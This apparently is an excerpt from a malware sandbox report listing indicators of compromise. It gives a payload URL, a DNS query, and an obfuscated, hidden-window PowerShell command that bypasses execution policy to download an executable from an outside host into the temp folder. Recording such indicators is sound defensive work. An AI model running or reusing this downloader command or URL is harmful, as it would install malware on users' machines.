Technical information
- http://www.raquelperezcoach.com/kelechi.exe as %temp%\\cpudll.exe
- '<SYSTEM32>\cmd.exe' /c PoWErShelL.eXe -wInDoWstyle HIDDeN -nOPRoFilE -eXEcutIoNPoLICy bYpasS (NEw-OBjEcT SyStem.NEt.WeBCLieNt).DowNLOADFiLe('http://www.raquelperezcoach.com/kelechi.exe','%TEMP%\\CPUdll.exe') & %TE...
- DNS ASK ra#####erezcoach.com
- '<SYSTEM32>\cmd.exe' /c PoWErShelL.eXe -wInDoWstyle HIDDeN -nOPRoFilE -eXEcutIoNPoLICy bYpasS (NEw-OBjEcT SyStem.NEt.WeBCLieNt).DowNLOADFiLe('http://www.raquelperezcoach.com/kelechi.exe','%TEMP%\\CPUdll.exe') & %TE...' (with hidden window)